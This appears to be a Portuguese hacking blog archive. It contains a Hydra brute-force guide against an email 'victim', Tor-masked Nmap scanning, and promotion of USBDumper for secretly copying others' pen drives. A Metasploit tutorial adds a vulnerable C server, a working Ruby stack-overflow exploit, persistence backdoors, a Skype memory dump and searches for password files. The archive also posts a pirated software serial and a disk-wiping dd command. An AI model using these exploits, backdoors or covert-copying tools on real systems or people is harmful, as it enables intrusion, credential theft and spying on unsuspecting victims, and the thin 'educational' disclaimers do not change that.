Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

domingo, 22 de abril de 2012

Como fazer Zero fill

Sempre que você faz uma formatação convencional no seu computador, com um recuperador de arquivos você consegue salvar alguns arquivos “perdidos”, no qual você esqueceu-se de fazer backup, porque a formatação apaga apenas parte do seu HD. Se você quer apagar seus arquivos definitivamente, sem deixar rastros de seus arquivos, a técnica zero fill faz essa função para você. Com essa técnica você apaga todos os dados do seu HD sem ter perigo de serem recuperados. Essa técnica é feita através de softwares próprios para isso, todos os HD’s tem um software específico para isso, e utilizar o errado pode dar uma dor de cabeça enorme no futuro. Conheça neste artigo um pouco mais sobre essa técnica.






1
Este tipo de formatação geralmente é utilizado pra quem quer vender o HD e não deixar vestígios.
Lembre-se de fazer backup dos arquivos, pois você não conseguirá recuperá-los após a formatação.

Primeiramente, você deve procurar o site da fabricante do seu HD. Encontre nesse site a listagem de todas as marcas: http://www.babooforum.com.br/forum/index.php?/topic/218252-fabricantes-de-hardware-e-companhia/. No site da fabricante do seu HD, você deve procurar pela opção zero fill e baixar o software dele. Depois disso, você cria um cd bootável com o software. Em seguida, você deve fazer a formatação com ele. Demora muito mais que a formatação convencional, mas porque ele deixa zerado o HD, e você não consegue mais recuperar seus arquivos após essa formatação.


  1. 2


    Utilize o comando “#dd if=/dev/zero of=/dev/xyz” para começar o processo, ou dependendo do fabricante escolha a opção “LOW LEVEL FORMAT”. Após isso aguarde, e quando aparecer a mensagem de disco cheio, estará pronta sua formatação.


    1. 3


      Lembrando que zero fill não é uma formatação física. A formatação física é feita na fábrica antes de ir para as lojas. O zero fill zera a superfície do HD. Além de recuperar setores defeituosos que nem o Windows consegue recuperar.

      Esse tipo de formatação não estraga o disco rígido, pode até melhorar o desempenho deste. Mas o recomendado é não fazer muitas vezes, pois prejudica muito o HD pelo tempo que demora a ser feito. O recomendado é baixar um software de análise de disco que faça a verificação e veja se o HD realmente precisa do zero fill. No site do Baixaki (http://baixaki.com.br) você encontra diversos softwares de reparação, entre eles o HDD Regenerator, que faz a análise e se necessário faz uma reparação no HD.
      Independente da quantidade de partições que você tiver o zero fill apaga todas as partições do HD, sem deixar nenhum vestígio.

      Após formatar com o zero fill, você pode instalar o Sistema Operacional normalmente.
    2. 4

      Caso você queira conhecer melhor sobre o assunto, este link possui informações bem interessantes sobre o assunto. Acesse: http://www.iotecnologia.com.br/format-c-que-nada-zero-fill-arranca-at-a-alma-do-seu-hd.

domingo, 15 de abril de 2012

Seminário de Iniciação Hacker

Quando as pessoas nos procuram para aprender sobre hackers,
percebemos que a maioria tem dificuldade para definir de forma 
assertiva, o que exatamente os hackers são e o que fazem.  
A maior preocupação destas pessoas é quanto à possibilidade das 
ações hacker serem consideradas crime. Querem aprender a 
fazer hacks, mas querem ter certeza de não estar fazendo algo 
ilegal.

terça-feira, 10 de abril de 2012

Anonymous lidera votação popular dos mais influentes da TIME100


A votação popular para a escolha dos 100 mais influentes do mundo, lista elaborada anualmente pela revista americana Time, terminou com o coletivo de ativistas hackers Anonymous no topo. A organização teve 395.793 votos, 130 mil a mais que o gerente-geral do Reddit, Erik Martin.


A escolha ainda depende da aprovação do juri da Time, que dá a palavra final sobre os eleitos do conceituado ranking. Se aceita, a vitória do Anonymous colocará o grupo ao lado de grandes nomes como Mahatma Gandhi, Mark Zuckerberg e Barack Obama.
A pessoa mais influente do ano, no entanto, é escolhida pelos editores da revista, e o nome será divulgado no dia 17 abril. Obrigado à Todos por ter votado na Anonymous, Unidos como um, Divido por Zero.


LINK

domingo, 8 de abril de 2012

Hackear senhas de emails com o hydra


Boa tarde pessoal, hoje vou lhes ensinar a "hackear" um email pelo metodo de força bruta (material educativo, se for fazer, por favor, faça com seu próprio email), o software que vamos usar chama-se hydra, sua instalação é simples,e há milhares de tutoriais no Google, por isso vou pular esta parte.
Ates de começar, vamos saber mais um pouco sobre o hydra e para que ele serve.
"O THC-hydra usa um mecanismo de força bruta para quebrar senhas (brute force em inglês), este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de senhas e nomes de usuários até chegar ao seu objetivo óbvio." 
Supondo que você já esteja com o hydra instalado (tutorial será com o hydra gtk para entendimento mais fácil, na distribuição de linux Backtrack, que é baseada em Ubuntu, Para baixar o Backtrack clique aqui), já podemos começar;
Bem, este tutorial se foca em ataques pop3 (para saber mais sobre o pop3, clique aqui), mas com hydra você pode atacar vários outros protocolos, vejá uma lista abaixo:

TELNET, FTP, FIREBIRD, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, HTTP-PROXY-NTLM, HTTP-FORM-GET, HTTP-FORM-POST, HTTPS-FORM-POSTLDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL, POSTGRES, POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, PCNFS, ICQ, SAP/R3, CISCO AUTH, CISCO ENABLE, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, CISCO, AAA, REXEC, SOCKS 5, VNC, POP3 e VMWARE AUTH.

 Começando, digite xhydra no terminal, isso deve abrir o hydra gtk:
Na primeira aba temos as seguintes opções:

Single target (esta opção deverá ser usada caso você tiver o servidor do atacante no nosso caso o pop3 do email)
Target list (está deverá ser usada se você tiver uma lista de servidores de deseja atacar)
Prefer IPV6 ( nunca usei esta)
Port (porta a ser atacada)
Protocol (tipo de procolo do servidor que será atacado)
Use SSL (usar conexão SSL, usado muito para pop3)
Be Verbose (modo verbal, ele irá mostrar todas as saidas)
Show attempts (mostra as senhas que foram tentadas)
Debug (nunca usei também)
Nesta aba, deixe as configurações da seguinte maneira:


Nota: farei o teste com email da hotmail, caso você for testar com outro, por exemplo gmail, yahoo, uol, etc... Mude as configurações para seus respectivos servidores pop3
 Na segunta aba temos:

Username (aqui é onde colocaremos o email, caso for fazer a um ftp, coloque o nome de user)
Username list (se você tiver uma lista com vários emails ou logins, você pode usar esta opção)
Password (aqui é se você tiver a senha da pessoa, mas não souber o email/login)
Password list (aqui está o pulo do gato, esta opção é a que usaremos, você deve ter uma wordlist, com milhares de senhas, o hydra ira tentar todas, até que uma dê certo, o hydra não funciona sem uma wordlist, caso não tenha uma, já poste algumas aqui no blog, Wordlist em português, Wordlist de nomes, Outra wordlist em português, e tenho mais algumas em meu computador que postarei mais tarde)
Use colon separated file (caso você tenha uma wordlist de users e senhas separados por : (user:senha), este tipo é bastante ultilizado por hackers, pois quando se consegue invadir um servidor de usuários e senhas, na maioria das vezes, se vem neste formato)
Try login as password (tentar login na senha)
Try empty password (tentar senha em branco, nunca usei)

Deixe-a assim:

Em username: coloque o email da vitima (no meu caso, um email que acabei de criar)
Em password list: coloque sua wordlist, é só clicar na caixa e ir até onde você salvou ela ( usei uma pequena já com a minha senha dentro dela, para não demorar muito)


Deixe as abas Tuning e Specific do jeito que estão, vá para a aba Start e clique em start;
Se sua wordlist for boa, em algumas horas você conseguirá a senha, no meu caso, usei uma wordlist feita por mim com umas dezenas de números aleatórios e minha senha no final .



Como vocês podem ver, o hydra atacou 21 senhas em menos de 1 segundo, isso é muito poder, se você tiver uma wordlist razoável, você consegue muita coisa maléfica com ela.
Qualquer dia posto minha wordlist de números de telefone, será uma mão na roda para os novatos.

Como disse no inicio, este material é apenas educativo, não tente fazer isso em emails que não sejam seus, ou não autorizado pelo dono, isto pode acarretar sérios problemas na justiça.

Microsoft lança Ferramenta para Resolução de Problemas portátil para corrigir automaticamente problemas do Windows


A Microsoft lançou uma versão portátil do Fix It, que pode ser utilizada de uma unidade USB e em seguida, você pode corrigir qualquer sistema de computador sem necessidade de conexão com a Internet ou baixar várias ferramentas de correção uma por uma.
Para usar esta nova versão portátil, primeiro você precisa baixar o arquivo de configuração principal do seguinte link:


DOWNLOAD 


Após o download, execute o arquivo EXE e ele vai baixar a ferramenta completa. Você pode salvar a pasta em qualquer local desejado ou em seu dispositivo USB. Você pode executar a ferramenta clicando no arquivo "Start Fix it.exe" A interface principal mostra links para todos Fix disponíveis, como mostrado na figura a seguir:
 
Clique em "Run Now" perto do problema que está relacionado com o seu problema e ele vai automaticamente iniciar o solucionador de problemas. Siga as instruções dadas pela solução de problemas e você será capaz de resolver o seu problema.
Seguem-se os principais problemas que podem ser resolvidos:
  • Tema Aero
  • Reprodução de áudio
  • Gravação de Áudio
  • CD / DVD
  • Codecs
  • Dispositivos
  • Visor de qualidade
  • Troca Conectado
  • IE Add-on
  • Desempenho IE
  • Manutenção
  • Malware
  • MSN Cliente
  • Execução
  • Fotos
  • Poder
  • Impressão
  • Programa Install and Uninstall
  • Windows Search
  • Firewall do Windows
  • O Windows arquivos e pastas
  • Windows Media Player
  • Segurança do Windows
  • Windows USB
  • Windows Phone 7 ou Zune
  • Windows Update
 

sábado, 7 de abril de 2012

GetDataBack for FAT e NTFS 3.03 + Serial - RECUPERAR DADOS DE HD

GetDataBack é uma potente ferramenta de recuperação de arquivos, capaz de recuperar os dados perdidos através de uma infecção de vírus, uma falha geral do sistema, um problema grave com o disco físico ou mesmo ter deletado um arquivo por acidente.
É fácil de usar, graças a seu sistema de recuperação dividido em cinco passos que vai lhe indicando o que fazer em cada momento. GetDataBack utiliza avançados algorítimos para garantir a recuperação total e correta de arquivos e diretórios.

Além dessa versão, para sistemas de arquivos FAT, existe outra versão, para sistemas de arquivos NTFS (GetDataBack for NTFS).Certifique-se que estará usando a versão correta para recuperar seus arquivos.

Caso os Seriais contido no arquivo compactado não funcione, use os adicionais listados a baixo.

NOVO SERIAL (UPDATE: 23/05/2014)

Name: Noel Baker 

S/N: FZFGNDYGPIBCBY


Tamanho : 4,97 MB
Senha : hchost
Upload : 4Shared.com


quarta-feira, 4 de abril de 2012

Exploit Submission Wizard - Seu site em milhares de mecanismos de busca

Cadastre seu site em milhares de mecanismos de busca ao mesmo tempo.






O Exploit Submission Wizard cadastra automaticamente seu site em mulhares de mecanismos de busca. Basta preencher um formulário existente no programa e mandar ver. Em alguns minutos seu site estará cadastrado nos melhores mecanismos de busca da internet.


Tamanho : 6,00 MB
Senha : Não Contem SENHA!

Nmap e TOR - Aumentar seu anonimato nos Scannings



Abra a Shell...

Passo 1

# apt-get install tor privoxy
Passo 2
Configure o privoxy

# nano /etc/privoxy/config
No fim do arquivo config, insira a linha:


forward-socks4a / localhost:9050 .
detalhe depois da porta 9050 espaço em branco e ponto.

Passo 3

# privoxy /etc/privoxy/config
Passo 4

# tor
Passo 5

#proxychains nmap -sT -PN -n -sV -p21,25,80 10.0.2.15


ProxyChains-3.1 (
ProxyChains - TCP and DNS through proxy server. HTTP and SOCKS)

Starting Nmap 5.35DC1 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2010-08-30 11:34 BRT
|S-chain|-<>-127.0.0.1:9050-<><>-10.0.2.15:21-<--denied
|S-chain|-<>-127.0.0.1:9050-<><>-10.0.2.15:80-<--denied
|S-chain|-<>-127.0.0.1:9050-<><>-10.0.2.15:25-<--denied
Nmap scan report for 10.0.2.15
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
21/tcp closed ftp
25/tcp closed smtp
80/tcp closed http

Service detection performed. Please report any incorrect results at Nmap - Free Security Scanner For Network Exploration & Security Audits.. org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds



USBDumper - Copie secretamente os dados de um pen drive plugado em sua máquina!

 
Imagine  a situação que você precisa de algum arquivo que alguém que você conheça tenha mas não queria te arrumar, daí você tem oportunidade de acessar a máquina que ele usa, quando você rodar esta programinha no computador, após o pen drive deste seu conhecido for reconhecido na máquina, a cópia começará, TOTALMENTE OCULTA, ou seja, você terá um backup completo daquele professor com suas provas e notas. Curtiu a idéia? 
"USBDumper é um aplicativo com a função de “espionar” quem conecta algum pendrive em seu computador. Com ele, basta uma unidade de armazenamento ser inserida na entrada USB do PC para que comece o processo de transferência dos arquivos existentes nela para uma pasta secreta do seu sistema operacional."


domingo, 1 de abril de 2012

Conciência Anonymous - Muito MAIS!




Ser um Anonymous não se resume a hackerativismo. Não se resume a atacar o sistema que você considera falho. Não se resume a entrar em alguma rede de comunicação social e falar de subrotinas e subsistemas de programações, sites e afins.
Ser um Anonymous é ter consciência do que acontece ao seu redor. Do que acontece em sua cidade. Do que acontece na política, se há ou não pessoas passando fome em sua cidade, no seu país, no mundo e o que você faz para mudar isso.  O que você faz???
Há uma guerra do outro lado do mundo, o que você faz? A maioria das pessoas não tem acesso a internet como você, o que você faz? 75% das pessoas no mundo não tem acesso a internet, você sabia disso?? São aproximadamente 1 bilhão 750 milhões de pessoas que tem acesso.As outras 5.520 bilhões não tem acesso a internet ou são analfabetos digitais. Que diferença faz? O que você vai fazer  agora?? Olhe ao seu redor.
Não adianta bradar ao mundo que você se rebela contra ele, se as pessoas não entendem pelo o que você luta, se não compreendem o que você faz, se nem mesmo você sabe a finalidade do que você faz. E o que você faz?
Estar na Anonymous vai além do que sonhamos, vai além do que acreditamos, vai além de nossa realidade. Nossa responsabilidade aqui é de abrir os olhos da população mundial para a ilusão em que esta mesma está inserida. Ilusão essa amarga e escravizadora, que manipula a grande massa de seres humanos que são massacrados pelo sistema, desumanizados, robotizados.
Nossa missão primeiramente é nos manter unidos mas, nossa missão principal  é a de conscientizar as pessoas da realidade em que vivem, mostrar a elas que é possível mudar, que é possível sair dessa realidade insana, é possível controlar a corrupção, é possível tornar nosso país um país melhor e mais sadio para seu povo. Que nós podemos unir a população e guiá-la para um bem comum melhor. Que podemos lutar e defender os direitos da raça humana, do povo brasileiro.
Além de ser um Anonymous virtual, seja um Anon em uma célula real em sua cidade ou próximo a ela. Trabalhe com a operação Acorda que é constante, real e necessária. A operação Acorda consiste em você informar a população que não possui acesso a internet o que é a Anonymous, quais são nossos objetivos, nossas ideias, ideais, o que fazemos aqui no Brasil, o que fazemos ao longo do mundo, se eles desejam se tornam um Anonymous.
Vamos ganhar a simpatia da população comum.

Somos Anonymous
Não esquecemos
Não desistimos
Não perdoamos
Esperem por nós.

Introduçao ao Metasploit - Parte 01

Um artigo sobre a utilização do framework Metasploit, vamos ver alguns passos básicos, como a exploração de um software vulneravel, criação de um backdoor, realizar o dump da memória RAM do alvo, verificar as possiveis conversas realizados pelo aplicativo Skype, entre outros. Let`s go!


Requisitos


Para este artigo, utilizei o seguinte ambiente e softwares:


1 - Backtrack 4 R1 instalado no HD (Hard Disc).
-----> Não ensinarei como instalar o Backtrack no HD, espero que você saiba, caso não, veja mais em Backtrack Hard Drive Install e para baixar a última versão do Backtrack, basta acessar este link e fazer o download:

BackTrack Download

Após o download, dê a permissão de execução:


root@bt:~# chmod +x Virtualbox-3.2.8-64453-Linux_x86.run


Em seguida, basta executá-lo:


root@bt:~# ./Virtualbox-3.2.8-64453-Linux_x86.run


Digite "yes" todas as vezes que lhe for perguntado. Pronto, seu virtualbox já está instalado. Foi criado um atalho em:


Menu Dragon --> System --> Oracle VM VirtualBox - Virtual Machine


Resta apenas criar a máquina virtual com o Windows XP, na qual não explicarei neste artigo.

3 - Software Skypeex.
-----> Para baixar esta ferramenta, basta visitar o link abaixo e fazer o download. Explicarei nos próximos capitulos a sua utilização, não sejam apressados.

Link

4 - Programa vulneravel em linguagem C, compile em seu Windows e o execute. Segue o código:

Link

#include 
#include 

#include 


//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}

int main(int argc, char **argv)
{

WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";

u_short LocalPort;
LocalPort = 200;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );

if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}

Não sabe compilar no windows? Procure por Dev-C++ ou LCC-Win32 no google que rápidinho você passará a saber! 

5 - 

Adicionando Exploit ao MSF

Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, para motivo de organização:

O que estou adicionando? Para qual sistema operacional ele é útil? O que ele explora?

Entendeu mais ou menos?

Vou explicar. Vamos para o diretório padrão do msf, para isso digite:
root@bt:~# cd /pentest/exploits/framework3/ root@bt:/pentest/exploits/framework3# ls
HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test
README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools
data external modules msfd msfgui msfpayload msfrpcd scripts
root@bt:/pentest/exploits/framework3# 

Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em /opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).
Agora entre no diretório modules:

root@bt:/pentest/exploits/framework3# cd modules/

Agora em exploits. (O que estou adicionando?)

root@bt:/pentest/exploits/framework3/modules# cd exploits/

Em windows. (Para qual sistema operacional ele é útil?)

root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/

E por fim em misc. (O que ele explora?)

root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/

Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de sua preferência.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano exploit_stackoverflow.rb

Agora insira o exploit abaixo:

http://pastebin.com/raw.php?i=H26uL5ih

#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'

class Metasploit3 < info =" {})"> 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',

'Targets' =>
[
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(200)
], self.class)
end

def exploit
connect

junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end


Créditos Exploit: "Peter Van Eeckhoutte"

Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.

Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# msfconsole

Veja figura abaixo.



Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.


Explorando

Na máquina windows, execute o programa vulnerável. Para checarmos se está funcionando direitinho, basta um simples scan usando o nmap em nosso alvo, procurando pela porta 200, que é a porta que o nosso programa vulnerável "escuta".



Como pode ver acima, esta correndo tudo bem. Agora vamos usar o exploit que acabamos de adicionar para "ganharmos" acesso ao alvo.



Como pode ver acima, esta correndo tudo bem. Agora vamos usar o exploit que acabamos de adicionar para "ganharmos" acesso ao alvo.

Experimente digitar "ipconfig" e verá o IP do micro em que estamos. Logo em seguida, digite "ps" e verá todos os processos atuais no alvo.



Procure sempre migrar para um processo estável, pois dependendo do método utilizado para a intrusão no mundo real, o usuário que está utilizando o micro alvo, pode perceber algum "travamento" no software e fechá-lo. Para isso basta usar o comando "migrate" com a ajuda do "ps" mostrado acima. Procure pelo PID associado ao processo explorer.exe, que neste caso é o 1080.


Obs.: Em cada micro o PID poderá sofrer alterações.

DICA:

Durante a execução do exploit, podemos utilizar uma opção avançada para que faça a migração de processo automaticamente, nos poupando ter que digitar manualmente. Já imaginou se você enviar diversos arquivos pdfs, executáveis, arquivos xls/doc, etc, infectados para diversos alvos e tenha que migrar de processo em cada um? Não seria bom. Para isso podemos utilizar a opção "AutoRunScript", veja na figura abaixo.




Ok, vamos para a próxima parte!


Backdoor

Para que possamos continuar com o acesso ao alvo futuramente, precisamos instalar um backdoor, para isso vamos utilizar o script meterpreter "persistence", já comentei sobre ele em outro artigo.

Passando o parâmetro -h, ele nos mostra as opções disponíveis deste script. Veja abaixo.



Agora vamos utilizá-lo passando o parametro -X, veja na imagem e tente entender o que aconteceu olhando a saida do comando.



O comando acima criará um arquivo executável na maquina destino, a opção -X serve para que o arquivo criado seja executado durante o boot da máquina destino, vejam onboot=true. Repare na saída do comando o endereço IP local da máquina do atacante e que ela escutará na porta 4444, que é a padrão, podemos alterar a porta padrão para outra que nos convenha usando a opção -p seguido do número da porta, exemplo, -p 5555.

Veja que foi feito o upload do executável em C:\DOCUME~1\espreto\CONFIG~1\Temp\TcDWaEUCyFZC.vbs e foi identificado com o PID 728.

E em seguida foi criado e instalado um arquivo autorun na seguinte chave do registro HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tubTxZTznuuT.

Na ultima linha, ele nos da a opção para desfazer do "backdoor" que acabamos de criar, basta executar o comando conforme é mostrado. E é exatamente isso que vamos fazer agora, remover o backdoor recente instalado.



Mais Roberto, você nem mostrou como funciona na prática este backdoor!! Calma, basta acessar o outro artigo do VoL para ver como fazer isso.
http://www.vivaolinux.com.br/artigo/Metasploit-Exploitation/?pagina=6


Agora, vamos imaginar a seguinte situação: Acabamos de executar o script "persistence" usando a opção -X do micro com IP 192.168.1.181,certo? E se eu quiser conectar ao alvo de outro IP? Digamos que do IP 172.16.10.10? Bom, lembra do parâmetro -h? Utilize-o para visualizar novamente os parâmetros. Veja a imagem abaixo.



Com a opção "-U" o nosso agente será executado quando o usuário fizer o logon.
Parâmetro "-i 10" irá tentar a conexão com o IP especificado do atacante a cada 10 segundos, este valor pode ser alterado.
Parâmetro "-p 3773" especifica em que porta do micro do atacante, o metasploit estará escutando, neste caso na porta 3773.
E por último o parâmetro "-r 172.16.10.10" que especifica o IP que o atacante utiliza o metasploit conectar de volta.
As linhas seguintes, seguem a mesma linha de raciocínio quando foi usado a opção "-X".

Para usar o comando acima, basta alterar o IP 172.16.10.10 para o seu IP do micro (ou VM) executando o Backtrack/Metasploit.

Ok, agora desconecte desta atual sessão no meterpreter usando o comando "exit -y" e vamos utilizar o multi/handler para conectarmos novamente em nosso alvo, só que agora utilizando nosso backdoor.



E voilà! Temos acesso a shell meterpreter novamente. Vamos supor que o usuário ao abrir o gerenciador de tarefas do windows, note o processo "wscript.exe" suspeito e o finaliza (Acho bem improvável, mais...)! Perdemos a conexão "momentâneamente" com o alvo. Sendo assim recomendo migrar para o processo "explorer.exe" para que também possamos utilizar outros scripts que só funcionam estando neste processo. Vamos utilizar o "AutoRunScript", para isso desconecte novamente do meterpreter, saia também do console do msf e execute o metasploit desde o inicio.


Veja a imagem acima e repare que realizou exatamente o que queriamos.

Notaram que tivemos que digitar diversas vezes os comandos para conectarmos em nosso alvo? E se pudessemos automatizar isso digitando apenas uma vez? Ou apenas para fazer uma ou outra alteração?
Então vamos utilizar um recurso chamado "resource file", basta abrir seu editor de texto favorito e digitar os comandos linha por linha, como abaixo.



Depois de editado, basta executar da seguinte forma.



Tudo certo até aqui?

Process Dumping

De posse da shell meterpreter, vamos executar o script "process_dumping" em cima do processo do Skype. Vamos ver se a gente consegue achar algumas conversas?

Ok, no console no meterpreter, digitamos "run process_dumping -n Skype.exe" ou "run process_dumping -p PID" onde você deverá trocar o PID para o valor correto. Não sabe como ver isso? Basta executar o comando "ps", veja abaixo.



Neste caso, usarei especificando o PID

meterpreter> run process_dumping -p 976 



Esperamos o termino e ele nos diz onde foi salvo o dump.



Pronto! Após o termino, vamos abrir uma nova shell e deixar o dump gerado mais "legível", para isso utilizamos o comando "strings", veja abaixo.



root@bt:~# cat dumping_skype.txt | grep "#robertoespreto" | more

Basta trocar "robertoespreto" pelo login correto.

Existe também um software chamado Skypeex, com ele você poderá visualizar de uma forma mais amigável este arquivo .txt. Segue o link para auto-estudo.

http://csitraining.co.uk/skypex.aspx



Procurando por arquivos.

Ok, vamos conectar novamente em nosso alvo para procurarmos arquivos "interessantes". Utilize a forma que achar melhor para se conectar novamente, digitando todos os comandos ou através do arquivo resource file, fica a seu critério! :)

Certo, de posse da shell meterpreter novamente, vamos usando o comando "search" para procurarmos por extensões conhecidas de arquivos, por exemplo, .xls do excel. Use o "-h" para visualizar os parâmetros do search.



Ok, como já disse, vamos procurar por arquivos criados com o excel, ou seja, os arquivos que tenha extensão .xls. Veja na figura abaixo.


Os parâmetros:

A opção "-d c:\\" diz que vamos procurar a partir da unidade C:.
A opção "-f *.xls" diz que vamos procurar por todos os arquivos que tiver a extensão .xls.
A opção "-r true" diz que a procura incluirá todos os subdiretórios além do atual.

Agora, eu quero pesquisar somente os arquivos .xls que esteja na area de trabalho do alvo. Eu também sei que uma parte do nome do arquivo possui a palavra "senha". Como ficaria a sintaxe?



Usem a imaginação, procurem por outras extensões. 

Guardem estes pequenos conceitos deste artigo para continuarmos na parte 2.
Acabou sua cerveja quando chegou aqui? Ah, busque mais e seja feliz! Ah, vale ir de refrigerante também.